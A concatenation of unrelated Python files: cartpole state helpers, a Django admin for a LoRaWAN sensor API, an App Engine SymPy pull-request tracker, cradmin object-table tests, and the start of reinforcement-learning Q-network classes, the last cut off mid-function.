def cartpole_state_varnames_to_indices(variable_names: list) -> list:
indices = []
for variable_name in variable_names:
indices.append(cartpole_state_varname_to_index(variable_name))
return indices
def cartpole_state_indices_to_varnames(indices: list) -> list:
varnames = []
for index in indices:
varnames.append(cartpole_state_index_to_varname(index))
return varnames
def cartpole_state_namespace_to_vector(s_namespace: SimpleNamespace) -> np.ndarray:
s_array = np.zeros_like(STATE_VARIABLES, dtype=np.float32)
for a in STATE_VARIABLES:
s_array[cartpole_state_varname_to_index(a)] = getattr(
s_namespace, a, s_array[cartpole_state_varname_to_index(a)]
)
return s_array
def cartpole_state_vector_to_namespace(s_vector: np.ndarray) -> SimpleNamespace:
s_namespace = SimpleNamespace()
for i, a in enumerate(STATE_VARIABLES):
setattr(s_namespace, a, s_vector[i])
return s_namespace
# # Test functions
# s = create_cartpole_state(dict(angleD=12.1, angleDD=-33.5, position=2.3, positionD=-19.77, positionDD=3.42))
# s[POSITIOND_IDX] = -14.9
# cartpole_state_index_to_varname(4)
# sn = SimpleNamespace()
# sn.position=23.55
# sn.angleDD=4.11
# sn.eew = -1.22
# q = cartpole_state_namespace_to_vector(sn)
# v = cartpole_state_vector_to_namespace(q)
# print(s)
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import User
from api.models import Gateway
from api.models import Point
from api.models import Node
from api.models import NodeType
from api.models import Key
from api.models import Rawpoint
from api.models import Profile
from api.models import LoRaWANRawPoint
from api.models import LoRaWANApplication
from api.models import ABP
class ProfileInline(admin.StackedInline):
model = Profile
show_change_link = True
class UserAdmin(BaseUserAdmin):
inlines = ( ProfileInline, )
class GatewayAdmin(admin.ModelAdmin):
list_display = ('id', 'mac', 'owner', 'serial', 'location', 'gps_lon', 'gps_lat')
class RawpointAdmin(admin.ModelAdmin):
list_display = ('id', 'seq_number', 'timestamp', 'payload', 'rssi', 'snr', 'node_id', 'gw', 'gateway_serial', 'state')
list_filter = ('node_id', 'gw', 'gateway_serial')
class LoRaWANRawPointAdmin(admin.ModelAdmin):
list_display = ('id', 'DevAddr')
list_filter = ('DevAddr', 'datr', 'chan')
class PointAdmin(admin.ModelAdmin):
list_display = ('id', 'rawpoint_id', 'key', 'value', 'timestamp', 'node_id', 'gw')
list_filter = ('gw', 'node_id', 'key')
search_fields = ('gw__description', 'node__name')
raw_id_fields = ('rawpoint', )
class KeyAdmin(admin.ModelAdmin):
list_display = ('numeric', 'key', 'unit')
class NodeAdmin(admin.ModelAdmin):
list_display = ('node_id', 'owner', 'name', 'description', 'api_key', 'nodetype')
admin.site.register(Gateway, GatewayAdmin)
admin.site.register(Node, NodeAdmin)
admin.site.register(NodeType)
admin.site.register(Key, KeyAdmin)
admin.site.register(Point, PointAdmin)
admin.site.register(Rawpoint, RawpointAdmin)
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
admin.site.register(LoRaWANRawPoint, LoRaWANRawPointAdmin)
admin.site.register(LoRaWANApplication)
admin.site.register(ABP)
|
import os
from datetime import datetime
import logging
import sys
import traceback
from random import random
import urllib2
from google.appengine.dist import use_library
use_library("django", "1.2")
from django.utils import simplejson as json
from google.appengine.ext import webapp, db
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.api import taskqueue
from jsonrpc_client import JSONRPCService, JSONRPCError
from jsonrpc_server import JSONRPCServer
from models import PullRequest, Task, User, UploadURL
from github import (github_get_pull_request_all_v2,
github_get_pull_request_all_v3, github_get_pull_request,
github_get_user)
from utils import pretty_date
dev_server = os.environ["SERVER_SOFTWARE"].startswith("Development")
if dev_server:
url_base = "http://localhost:8080"
else:
url_base = "http://reviews.sympy.org"
# default github user and repo
polled_user = "sympy"
polled_repo = "sympy"
class RequestHandler(webapp.RequestHandler):
def render(self, temp, data=None):
"""
Renders the template "temp" with data 'data'.
Handles default data fields, as well as path to the templates.
"""
name, _ = os.path.splitext(temp)
d = {
'dev_server': dev_server,
name + '_selected': "selected",
}
if data is not None:
d.update(data)
path = os.path.join(os.path.dirname(__file__), "..", "templates", temp)
s = template.render(path, d)
self.response.out.write(s)
class MainPage(RequestHandler):
def get(self):
q = PullRequest.all()
q.order("last_updated")
# This is the request that wasn't updated for the longest time:
p = q.get()
if p is None:
last_update = None
last_update_pretty = "never"
else:
last_update = p.last_updated
last_update_pretty = pretty_date(last_update)
q = PullRequest.all()
q.filter("state =", "open")
q.order("last_updated")
# This is the open request that wasn't updated for the longest time:
p = q.get()
if p is None:
last_quick_update = None
last_quick_update_pretty = "never"
else:
last_quick_update = p.last_updated
last_quick_update_pretty = pretty_date(last_quick_update)
p_mergeable = PullRequest.all()
p_mergeable.filter("mergeable =", True)
p_mergeable.filter("state =", "open")
p_mergeable.order("-created_at")
p_nonmergeable = PullRequest.all()
p_nonmergeable.filter("mergeable =", False)
p_nonmergeable.filter("state =", "open")
p_nonmergeable.order("-created_at")
self.render("index.html", {
"pullrequests_mergeable": p_mergeable,
"pullrequests_nonmergeable": p_nonmergeable,
"last_update": last_update,
"last_update_pretty": last_update_pretty,
"last_quick_update": last_quick_update,
"last_quick_update_pretty": last_quick_update_pretty,
})
class ClosedPullRequestsPage(RequestHandler):
def get(self):
p_closed = PullRequest.all()
p_closed.filter("state =", "closed")
p_closed.order("-created_at")
self.render("closed_pullrequests.html", {
"pullrequests_closed": p_closed,
})
class PullRequestPage(RequestHandler):
def get(self, num):
p = PullRequest.all()
p.filter("num =", int(num))
p = p.get()
t = p.task_set
t.order("uploaded_at")
self.render("pullrequest.html", {'p': p, 'tasks': t})
class ReportPage(RequestHandler):
def get(self, id):
t = Task.get(id)
logging.info(t.log)
self.render("report.html", {'task': t})
class AsyncHandler(webapp.RequestHandler):
def get(self):
self.response.out.write("AsyncHandler.")
def post(self):
def upload_task(num, result, interpreter, testcommand, log):
p = PullRequest.all()
p.filter("num =", int(num))
p = p.get()
if p is None:
# Create the pull request:
p = PullRequest(num=num)
p.put()
t = Task(pullrequest=p)
t.result = result
t.interpreter = interpreter
t.testcommand = testcommand
t.log = log
t.put()
result = {
"ok": True,
"task_url": "%s/report/%s" % (url_base, t.key())
}
return result
s = JSONRPCServer({
"RPC.upload_task": upload_task,
})
output = s.handle_request_from_client(self.request.body)
self.response.out.write(output)
class UploadPull(RequestHandler):
def post(self, url_path):
last_row = UploadURL.all().order("-created_at").get()
if last_row:
if last_row.url_path == url_path:
try:
payload = json.loads(self.request.get("payload"))
logging.info(payload)
except json.JSONDecodeError:
self.error(400)
self.response.out.write("Incorrect request format\n")
user_repo = payload["repository"]["full_name"]
# Download complete pull request with information about mergeability
pull_request = github_get_pull_request(user_repo, payload["number"])
num = payload["number"]
# Get the old entity or create a new one:
p = PullRequest.all()
p.filter("num =", int(num))
p = p.get()
if p is None:
p = PullRequest(num=num)
# Update all data that we can from GitHub:
p.url = pull_request["html_url"]
p.state = pull_request["state"]
p.title = pull_request["title"]
p.body = pull_request["body"]
p.mergeable = pull_request["mergeable"]
if pull_request["head"]["repo"]:
p.repo = pull_request["head"]["repo"]["url"]
p.branch = pull_request["head"]["ref"]
p.author_name = pull_request["user"].get("name", "")
p.author_email = pull_request["user"].get("email", "")
created_at = pull_request["created_at"]
created_at = datetime.strptime(created_at, "%Y-%m-%dT%H:%M:%SZ")
p.created_at = created_at
u = User.all()
u.filter("login =", pull_request["user"]["login"])
u = u.get()
if u is None:
u = User(login=pull_request["user"]["login"])
u.id = pull_request["user"]["id"]
u.avatar_url = pull_request["user"]['avatar_url']
u.url = pull_request["user"]["url"]
u.put()
p.author = u
p.put()
else:
self.error(404)
self.response.out.write("Requesting URL doesn't exist\n")
else:
self.error(500)
self.response.out.write("URL for posting data not defined yet\n")
def get(self, url_path):
def notify_admins(user, new_url):
from google.appengine.api.mail import send_mail_to_admins
mail = user.email()
subject = "SymPy bot notification"
body = "New upload URL " + new_url
send_mail_to_admins(sender=mail, subject=subject, body=body)
from google.appengine.api import users
user = users.get_current_user()
is_admin = users.is_current_user_admin()
rows = []
upload_url = ""
if user:
if is_admin:
if self.request.get("generate"):
import sha
rand_string = os.urandom(10)
sha_hash = sha.new(rand_string)
new_record = UploadURL(url_path=sha_hash.hexdigest(), user=user.nickname())
new_record.put()
new_url = self.request.host_url + "/upload_pull/" + \
sha_hash.hexdigest()
notify_admins(user, new_url)
if self.request.get("populate"):
taskqueue.add(url="/worker", queue_name="github")
rows = UploadURL.all()
last_row = rows.order("-created_at").get()
if last_row:
upload_url = (last_row.url_path)
else:
upload_url = ("")
self.render("upload_url.html", {"user": user,
"upload_url": upload_url,
"is_admin": is_admin,
"rows": rows,
"login_url": users.create_login_url("/upload_pull"),
"logout_url": users.create_logout_url("/upload_pull"),
}
)
class Worker(webapp.RequestHandler):
"""
This class using for populating pull requests database and users
(calls when admin press "Populate" button)
"""
def post(self):
user_repo = polled_user + "/" + polled_repo
payload = github_get_pull_request_all_v3(user_repo)
# checkout mergeability
for pos in xrange(len(payload)):
pull = github_get_pull_request(user_repo, payload[pos]["number"])
payload[pos]["mergeable"] = pull["mergeable"]
# Process each pull request from payload
for pull in payload:
p = PullRequest.all()
num = pull["number"]
p.filter("num =", num)
p = p.get()
if p is None:
p = PullRequest(num=num)
p.url = pull["html_url"]
p.state = pull["state"]
p.title = pull["title"]
p.body = pull["body"]
p.mergeable = pull["mergeable"]
if pull["head"]["repo"]:
p.repo = pull["head"]["repo"]["url"]
p.branch = pull["head"]["ref"]
created_at = pull["created_at"]
created_at = datetime.strptime(created_at, "%Y-%m-%dT%H:%M:%SZ")
p.created_at = created_at
# Collect public information about user
u = User.all()
login = pull["user"]["login"]
u.filter("login =", login)
u = u.get()
if u is None:
u = User(login=login)
u.id = pull["user"]["id"]
u.avatar_url = pull["user"]["avatar_url"]
u.url = pull["user"]["url"]
u.put()
p.author = u
p.put()
def main():
urls = [
('/', MainPage),
('/closed_pullrequests/?', ClosedPullRequestsPage),
('/async/?', AsyncHandler),
('/pullrequest/(\d+)/?', PullRequestPage),
('/report/(.*)/?', ReportPage),
('/worker/?', Worker),
('/upload_pull/?(.*)/?', UploadPull),
]
application = webapp.WSGIApplication(urls, debug=True)
run_wsgi_app(application)
|
from __future__ import unicode_literals
from builtins import str
from builtins import range
import htmls
from cradmin_legacy.python2_compatibility import mock
from django.test import TestCase, RequestFactory
from cradmin_legacy.tests.viewhelpers.cradmin_viewhelpers_testapp.models import TestModel
from cradmin_legacy.viewhelpers import objecttable
from cradmin_legacy.cradmin_legacy_testapp import models as testmodels
class TestColumn(TestCase):
def setUp(self):
class TestColSubclass(objecttable.Column):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestColSubclass, self).__init__(**kwargs)
self.model_testobject = TestModel()
view = mock.MagicMock()
view.model = self.model_testobject
self.column_subclass = TestColSubclass(view=view, columnindex=0)
def test_get_header_not_implemented(self):
test = objecttable.Column(view=None, columnindex=0)
with self.assertRaises(NotImplementedError):
test.get_header()
def test_get_header(self):
self.assertEqual("Test Value", self.column_subclass.get_header())
def test_render_value(self):
self.model_testobject.testfield = u'test_value'
self.assertEqual("test_value", self.column_subclass.render_value(self.model_testobject))
# check that you get an exception when running render_value without having modelfield..
def test_render_value_not_implemented(self):
col = objecttable.Column(view=None, columnindex=0)
with self.assertRaises(NotImplementedError):
col.render_value(None)
# check that you get an exception when running render_cell_content without overriding with subclass..
def test_render_cell_not_implemented(self):
col = objecttable.Column(view=mock.MagicMock(), columnindex=0)
with self.assertRaises(NotImplementedError):
col.render_cell_content(None)
class TestPlainTextColumn(TestCase):
def setUp(self):
class TestColSubclass(objecttable.PlainTextColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestColSubclass, self).__init__(**kwargs)
self.model_testobject = TestModel()
view = mock.MagicMock()
view.model = self.model_testobject
self.column_subclass = TestColSubclass(view=view, columnindex=0)
def test_render_cell(self):
self.model_testobject.testfield = 'test_value'
self.assertEqual(
'<span class="objecttable-cellvalue">test_value</span>',
self.column_subclass.render_cell_content(self.model_testobject).strip())
class TestSingleActionColumn(TestCase):
def setUp(self):
class TestIncompleteColSubclass(objecttable.SingleActionColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestIncompleteColSubclass, self).__init__(**kwargs)
class TestColSubclass(objecttable.SingleActionColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestColSubclass, self).__init__(**kwargs)
def get_actionurl(self, obj):
return 'www.example.com/{}'.format(obj.testfield)
self.model_testobject = TestModel(testfield="test_value")
view = mock.MagicMock()
view.model = self.model_testobject
self.column_subclass = TestColSubclass(view=view, columnindex=0)
self.column_subclass_incomplete = TestIncompleteColSubclass(view=view, columnindex=0)
def test_get_actionurl_ExceptionRaised(self):
with self.assertRaises(NotImplementedError):
self.column_subclass_incomplete.get_actionurl(self.model_testobject)
def test_render_cell_ExceptionRaised(self):
with self.assertRaises(NotImplementedError):
self.column_subclass_incomplete.render_cell_content(self.model_testobject)
def test_render_cell(self):
expected = '<a href="www.example.com/test_value" class="objecttable-cellvalue-link">test_value</a>'
self.assertEqual(self.column_subclass.render_cell_content(self.model_testobject), expected)
class TestMultiActionColumn(TestCase):
def setUp(self):
class TestIncompleteColSubclass(objecttable.MultiActionColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestIncompleteColSubclass, self).__init__(**kwargs)
class TestColSubclass(objecttable.MultiActionColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestColSubclass, self).__init__(**kwargs)
def get_buttons(self, obj):
return [objecttable.Button(label="Btn1", url="www.example.com/btn1"),
objecttable.Button(label="Btn2", url="www.example.com/btn2")]
self.model_testobject = TestModel(testfield="test_value")
view = mock.MagicMock()
view.model = self.model_testobject
self.column_subclass = TestColSubclass(view=view, columnindex=0)
self.column_subclass_incomplete = TestIncompleteColSubclass(view=view, columnindex=0)
def test_get_buttons_ExceptionRaised(self):
with self.assertRaises(NotImplementedError):
self.column_subclass_incomplete.get_buttons(self.model_testobject)
def test_render_cell_ExceptionRaised(self):
with self.assertRaises(NotImplementedError):
self.column_subclass_incomplete.render_cell_content(self.model_testobject)
def test_render_cell(self):
result = self.column_subclass.render_cell_content(self.model_testobject)
selector = htmls.S(result)
self.assertEqual(selector.one('p.objecttable-cellvalue').alltext_normalized,
'test_value')
self.assertTrue(selector.exists('p.objecttable-cellbuttons'))
self.assertEqual(selector.count('a'), 2)
class TestButton(TestCase):
def test_render_with_icon_and_class(self):
btn = objecttable.Button(
label="My Btn", url="www.example.com/mybtnurl",
buttonclass="btn btn-danger btn-sm",
icon="glyphicon glyphicon-shopping-cart")
selector = htmls.S(btn.render())
self.assertEqual(selector.one('a')['href'], 'www.example.com/mybtnurl')
self.assertEqual(selector.one('a')['class'], 'btn btn-danger btn-sm')
self.assertEqual(selector.one('a').alltext_normalized, 'My Btn')
self.assertEqual(selector.one('a span')['class'], 'glyphicon glyphicon-shopping-cart')
def test_render_simple(self):
btn = objecttable.Button(label="My Btn", url="www.example.com/mybtnurl")
selector = htmls.S(btn.render())
self.assertEqual(selector.one('a')['href'], 'www.example.com/mybtnurl')
self.assertEqual(selector.one('a')['class'], 'btn btn-default btn-sm')
self.assertEqual(selector.one('a').alltext_normalized, 'My Btn')
class TestOrderingStringParser(TestCase):
def test_parse_empty(self):
orderingqueryarg = objecttable.OrderingStringParser('')
self.assertEqual(len(orderingqueryarg.orderingdict), 0)
def test_parse_single(self):
orderingqueryarg = objecttable.OrderingStringParser('a3')
self.assertEqual(len(orderingqueryarg.orderingdict), 1)
self.assertTrue(orderingqueryarg.orderingdict[3])
def test_parse_multi(self):
orderingqueryarg = objecttable.OrderingStringParser('a3.d1')
self.assertEqual(len(orderingqueryarg.orderingdict), 2)
self.assertTrue(orderingqueryarg.orderingdict[3].order_ascending)
self.assertFalse(orderingqueryarg.orderingdict[1].order_ascending)
def test_remove_column(self):
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').remove_column(6),
'a3.d1')
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').remove_column(1),
'a3.a6')
def test_remove_nonexisting_colum(self):
self.assertEqual(
objecttable.OrderingStringParser('').remove_column(2),
'')
self.assertEqual(
objecttable.OrderingStringParser('a1').remove_column(2),
'a1')
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').remove_column(2),
'a3.d1.a6')
def test_flip_existing_column(self):
self.assertEqual(
objecttable.OrderingStringParser('d1').flip_column(1),
'a1')
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').flip_column(1),
'a3.a1.a6')
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').flip_column(3),
'd3.d1.a6')
def test_flip_new_column(self):
self.assertEqual(
objecttable.OrderingStringParser('').flip_column(1),
'a1')
self.assertEqual(
objecttable.OrderingStringParser('a3').flip_column(1),
'a3.a1')
class TestObjectTableView(TestCase):
def setUp(self):
self.factory = RequestFactory()
def _mock_request(self, request):
request.cradmin_role = mock.MagicMock()
request.cradmin_app = mock.MagicMock()
def test_empty(self):
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.none()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper').prettyprint()
self.assertFalse(selector.exists('#objecttableview-table'))
self.assertEqual(
selector.one('#objecttableview-no-items-message').alltext_normalized,
'No some items')
def test_empty_hide_search(self):
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
searchfields = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.none()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertFalse(selector.exists('.cradmin-searchform'))
def test_paginate_by_singlepage(self):
testmodels.SomeItem.objects.bulk_create(
[testmodels.SomeItem(name=str(x)) for x in range(4)])
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
paginate_by = 4
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper').prettyprint()
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 4)
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager'))
def test_paginate_by_firstpage(self):
testmodels.SomeItem.objects.bulk_create(
[testmodels.SomeItem(name=str(x)) for x in range(5)])
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
paginate_by = 4
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 4)
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .previous.disabled'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .next'))
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager .next.disabled'))
def test_paginate_by_lastpage(self):
testmodels.SomeItem.objects.bulk_create(
[testmodels.SomeItem(name=str(x)) for x in range(5)])
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
paginate_by = 4
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'page': 2
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 1)
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .previous'))
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager .previous.disabled'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .next.disabled'))
def test_paginate_by_middlepage(self):
testmodels.SomeItem.objects.bulk_create(
[testmodels.SomeItem(name=str(x)) for x in range(9)])
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
paginate_by = 4
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'page': 2
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper').prettyprint()
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 4)
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .previous'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .next'))
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager .previous.disabled'))
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager .next.disabled'))
def test_render_single_simple_column(self):
testmodels.SomeItem.objects.create(name='Item One')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>thead>tr>th'), 1)
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th').alltext_normalized,
'The name - Ordered descending - Click to order ascending')
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 1)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr>td'), 1)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr>td').alltext_normalized,
'Item One')
def test_render_multiple_simple_columns(self):
testmodels.SomeItem.objects.create(name='Item One', somenumber=10)
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name', 'somenumber']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>thead>tr>th'), 2)
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th:first-child').alltext_normalized,
'The name - Ordered descending - Click to order ascending')
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th:last-child').alltext_normalized,
'Somenumber - Ordered descending - Click to order ascending')
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 1)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr>td'), 2)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr>td:first-child').alltext_normalized,
'Item One')
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr>td:last-child').alltext_normalized,
'10')
def test_render_order_ascending_singlecolumn(self):
testmodels.SomeItem.objects.create(name='Item A')
testmodels.SomeItem.objects.create(name='Item B')
testmodels.SomeItem.objects.create(name='Item C')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'ordering': 'a0'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 3)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:first-child>td').alltext_normalized,
'Item A')
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:last-child>td').alltext_normalized,
'Item C')
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th').alltext_normalized,
'The name - Ordered ascending - Click to order descending')
def test_render_order_descending_column(self):
testmodels.SomeItem.objects.create(name='Item A')
testmodels.SomeItem.objects.create(name='Item B')
testmodels.SomeItem.objects.create(name='Item C')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'ordering': 'd0'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper thead').prettyprint()
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 3)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:first-child>td').alltext_normalized,
'Item C')
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:last-child>td').alltext_normalized,
'Item A')
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th').alltext_normalized,
'The name - Ordered descending - Click to order ascending')
def test_render_order_multicolumn(self):
testmodels.SomeItem.objects.create(name='Item A', somenumber=1)
testmodels.SomeItem.objects.create(name='Item B', somenumber=2)
testmodels.SomeItem.objects.create(name='Item C', somenumber=2)
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name', 'somenumber']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'ordering': 'a1.d0'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper thead').prettyprint()
self.assertEqual(selector.count('#objecttableview-table>thead>tr>th'), 2),
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th:first-child').alltext_normalized,
'The name - Ordered descending - Click to order ascending - Ordering priority 2')
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th:last-child').alltext_normalized,
'Somenumber - Ordered ascending - Click to order descending - Ordering priority 1')
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 3)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:first-child>td:first-child').alltext_normalized,
'Item A')
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:last-child>td:first-child').alltext_normalized,
'Item B')
def test_render_search_nomatch(self):
testmodels.SomeItem.objects.create(name='Item One')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
searchfields = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'search': 'Nothing matches this'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 0)
def test_render_search_match(self):
testmodels.SomeItem.objects.create(name='Item One')
testmodels.SomeItem.objects.create(name='Item Two')
testmodels.SomeItem.objects.create(name='Item Three')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
searchfields = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'search': 'Item Two'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 1)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr>td').alltext_normalized,
'Item Two')
def test_show_column_headers(self):
testmodels.SomeItem.objects.create(name='Item One')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertTrue(selector.exists('#objecttableview-table>thead'))
self.assertFalse(selector.exists('#objecttableview-table>thead.sr-only'))
def test_hide_column_headers(self):
testmodels.SomeItem.objects.create(name='Item One')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
hide_column_headers = True
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertTrue(selector.exists('#objecttableview-table>thead'))
self.assertTrue(selector.exists('#objecttableview-table>thead.sr-only'))
|
from abc import ABC, abstractmethod
from typing import Sequence, Tuple
import numpy as np
from torch import Tensor, nn
from ..prelude import Array, ArrayLike
from ..utils import Device
from .block import CNNBody, FCBody, LinearHead, NetworkBlock
from .prelude import NetFn
class ContinuousQFunction(ABC):
@abstractmethod
def q_value(self, states: ArrayLike, action: ArrayLike) -> Tensor:
pass
class DiscreteQFunction(ABC):
@abstractmethod
def q_value(self, state: Array, nostack: bool = False) -> Tensor:
pass
@property
@abstractmethod
def state_dim(self) -> Sequence[int]:
pass
@property
@abstractmethod
def action_dim(self) -> int:
pass
class DiscreteQValueNet(DiscreteQFunction, nn.Module):
"""State -> [Value..]"""
def __init__(
self,
body: NetworkBlock,
head: NetworkBlock,
device: Device = Device(),
do_not_use_data_parallel: bool = False,
) -> None:
if body.output_dim != np.prod(head.input_dim):
raise ValueError("body output and head input must have a same dimention")
super().__init__()
self.head = head
self.body = body
if not do_not_use_data_parallel and device.is_multi_gpu():
self.body = device.data_parallel(body) # type: ignore
self.device = device
self.to(self.device.unwrapped)
def q_value(self, state: Array, nostack: bool = False) -> Tensor:
if nostack:
return self.forward(state)
else:
return self.forward(np.stack([state]))
def forward(self, x: ArrayLike) -> Tensor:
x = self.device.tensor(x)
x = self.body(x)
x = self.head(x)
return x
@property
def state_dim(self) -> Sequence[int]:
return self.body.input_dim
@property
def action_dim(self) -> int:
return self.head.output_dim
def dqn_conv(*args, **kwargs) -> NetFn:
def _net(
state_dim: Tuple[int, int, int], action_dim: int, device: Device
) -> DiscreteQValueNet:
body = CNNBody(state_dim, *args, **kwargs)
head = LinearHead(body.output_dim, action_dim)
return DiscreteQValueNet(body, head, device=device)
return _net # type: ignore
def fc(*args, **kwargs) -> NetFn:
def _net(
state_dim: Sequence[int], action_dim: int, device: Device
